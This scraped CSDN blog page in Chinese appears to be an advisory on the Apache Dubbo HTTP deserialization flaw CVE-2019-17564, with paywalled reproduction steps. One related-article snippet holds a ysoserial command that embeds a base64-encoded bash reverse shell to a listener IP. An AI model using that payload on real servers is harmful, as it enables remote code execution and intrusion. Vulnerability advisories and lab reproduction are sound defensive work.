rmi 反序列化漏洞_CVE201917564 Apache Dubbo 反序列化漏洞安全通告

最新推荐文章于 2023-11-27 15:53:15 发布
最新推荐文章于 2023-11-27 15:53:15 发布
阅读量251 收藏
点赞数
文章标签: rmi 反序列化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36277690/article/details/112435614
版权
【背景】2020年2月10号,Apache Dubbo的反序列化漏洞(CVE-2019-17564)被公布,使用 Dubbo-Rpc-Http (2.7.3 or lower) 和Spring-Web (5.1.9.RELEASE or lower)的版本可被利用。Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容...
摘要由CSDN通过智能技术生成

【背景】
2020年2月10号,Apache Dubbo的反序列化漏洞(CVE-2019-17564)被公布,使用 Dubbo-Rpc-Http (2.7.3 or lower) 和Spring-Web (5.1.9.RELEASE or lower)的版本可被利用。Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。Dubbo原属于阿里巴巴的开源项目,2018年阿里巴巴捐赠给 Apache 基金会。【漏洞详情】在使用http协议的Dubbo中,会调用org.springframework.remoting.rmi.RemoteInvocationSerializingExporter 类,该类中 readObject()时未对用户传入的post数据做校验:

ef002390e8a0f392aa147f17e6b08d69.png

导致服务器存在特定gadgets的情况下可用作RCE(远程代码执行),这里在dubbo provider上用 JDK8U20 并添加 commons-collections4 4.0 复现:

最低0.47元/天 解锁文章
刘晋源
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-17564 Apache-Dubbo反序列化漏洞.md
04-12
CVE-2019-17564Apache-Dubbo反序列化漏洞
[CVE-2019-17564] Apache Dubbo deserialization vulnerability
公众号shadow sock7
02-12 1330
参考 https://mp.weixin.qq.com/s/pHnhHMNArAiZPVGR1btZIg https://www.mail-archive.com/dev@dubbo.apache.org/msg06225.html
《Vulhub-Aapche Dubbo Java反序列化漏洞(CVE-2019-17564)》
weixin_47118413的博客
12-29 821
在之前我想起在Vulhub漏洞平台复现过Aapche Dubbo Java反序列化漏洞(CVE-2019-17564),虽然不是最新的(CVE-2022-39198)漏洞,但也想把(CVE-2019-17564)分享一下。
Apache Dubbo 高危漏洞
yes
01-24 2140
你好,我是yes。 前不久 Log4j2 的漏洞不是闹得沸沸扬扬吗,上百个应用更新的那一天,还记忆犹新。 今天又看到了个 Apache Dubbo 的高危漏洞通告,好家伙一看这版本,我们的应用有漏洞… 其实这个漏洞爆出来已经很多天了,影响面没 Log4j2 大,所以没那么“火”,不过也是个高危漏洞。 又是一个可以远程代码执行的漏洞漏洞的类型是因为反序列化的问题。 从 360网络安全响应中心官网来看,1.14 号就通告了。 对这个漏洞的评定结果如下: 可以看到,还是属于影响比较严重的漏洞。 具体是因为
CVE-2019-17564漏洞复现[基于Ubuntu 16.04 LTS]
rep_Su的博客
02-15 4901
基于Ubuntu 16.04 LTS的CVE-2019-17563漏洞复现0x0 漏洞描述0x1 影响范围0x2 漏洞复现环境准备环境搭建漏洞展示0x3 其他修复建议关于此文参考链接 0x0 漏洞描述 Apache Dubbo支持多种协议,官方推荐使用 Dubbo 协议,CVE-2019-17564是属于Apache Dubbo HTTP协议中的一个反序列化漏洞,该漏洞的主要原因在于当Apache...
javaRMI反序列化漏洞验证工具
08-21
**Java RMI反序列化漏洞概述** Java RMI反序列化漏洞主要源于不正确的类型检查和信任机制。当接收到未经验证的远程调用时,如果服务器没有正确地校验或限制输入数据,攻击者可以通过构造恶意序列化数据来操控远程...
java反序列化漏洞-验证.rar
06-25
Java反序列化漏洞是软件安全领域的一个重要话题,尤其对于使用Java进行开发的系统来说,理解和防范这种漏洞至关重要。在Java编程中,序列化和反序列化是常见的数据传输和持久化手段,允许对象的状态被转换为字节流,...
weblogic--反序列化漏洞测试Test
10-19
3. **CVE漏洞编号**:WebLogic反序列化漏洞往往与特定的CVE(Common Vulnerabilities and Exposures)编号相关,比如CVE-2015-4852、CVE-2017-10271等。这些漏洞影响了WebLogic的不同版本,了解具体受影响的版本有助...
JAVA反序列化漏洞知识点整理
01-20
jenkins反序列漏洞跟过一遍之后,虽说梳理清楚了漏洞触发的大体流程,但是对于JAVA反序列化漏洞导致代码执行的原理仍旧不懂,因此有必要整理JAVA反序列化漏洞相关的知识点。  JAVA反序列化漏洞  反序列化漏洞的...
Aapche Dubbo安全的 Java 反序列化CVE-2019-17564
weixin_56537388的博客
11-27 317
Apache Dubbo 是一个高性能的、基于 Java 的开源 RPC 框架。
Aapche Dubbo Java反序列化漏洞CVE-2019-17564漏洞复现
weixin_48413667的博客
09-14 1319
一、软件介绍 Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。 二、漏洞描述 Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。 三、影响范围 Apache Dubbo ...
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 1001
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
漏洞预警|Apache Dubbo 存在反序列化漏洞
LJQClqjc的博客
03-09 709
棱镜七彩安全预警
dubbo CVE-2019-17564 CVE-2020-1948 漏洞复现
寒星的博客
06-02 2306
简介 Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。 CVE-2019-17564 漏洞简介 Apache Dubbo支持多种协议,官方默认为 Dubbo 协议,但是当用户选择http协议进行通信时,Apache Dubbo 在接受来自消费者的远程调用的POST请求的时候会执行一个反序列化的操作,由于没有任何安全校验,于是可以造成反序列化执行任意代码。 影响版本 2.7.0 <= Ap.
rmi 反序列化漏洞_[漏洞分析]CVE201917564/Apache Dubbo存在反序列化漏洞
weixin_29284885的博客
01-07 227
漏洞描述Apache Dubbo支持多种协议,官方推荐使用Dubbo协议.Apache Dubbo HTTP协议中的一个反序列化漏洞(CVE-2019-17564),该漏洞的主要原因在于当Apache Dubbo启用HTTP协议之后,Apache Dubbo对消息体处理不当导致不安全反序列化,当项目包中存在可用的gadgets时即可导致远程代码执行.CVE编号CVE-2020-17564...
安全反序列化_Apache Dubbo反序列化漏洞安全风险通告(CVE201917564)
weixin_39802132的博客
12-11 594
漏洞综述关于Apache DubboApache Dubbo 是一款高性能、轻量级的开源Java RPC框架,该框架在国内应用较为广泛,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。漏洞描述Apache Dubbo支持多种协议,官方推荐使用 Dubbo 协议,Apache Dubbo HTTP协议中存在反序列化漏洞(CVE-2019-17564...
Aapche Dubbo 反序列化漏洞复现(CVE-2019-17564)
0xSec
12-24 759
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。
rmi反序列化导致rce漏洞修复_[漏洞分析]CVE-2019-17564/Apache Dubbo存在反序列化漏洞...
weixin_39544333的博客
12-23 204
漏洞描述Apache Dubbo支持多种协议,官方推荐使用Dubbo协议.Apache Dubbo HTTP协议中的一个反序列化漏洞(CVE-2019-17564),该漏洞的主要原因在于当Apache Dubbo启用HTTP协议之后,Apache Dubbo对消息体处理不当导致不安全反序列化,当项目包中存在可用的gadgets时即可导致远程代码执行.CVE编号CVE-2020-17564漏洞威胁等...
RMI反序列化漏洞 修复
最新发布
06-08
RMI反序列化漏洞是一种常见的Java Web应用程序漏洞,攻击者可以利用该漏洞在目标服务器上执行任意代码。该漏洞利用的核心是Java的反序列化机制,攻击者可以通过构造特定的序列化对象来触发漏洞。 要修复RMI反序列化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值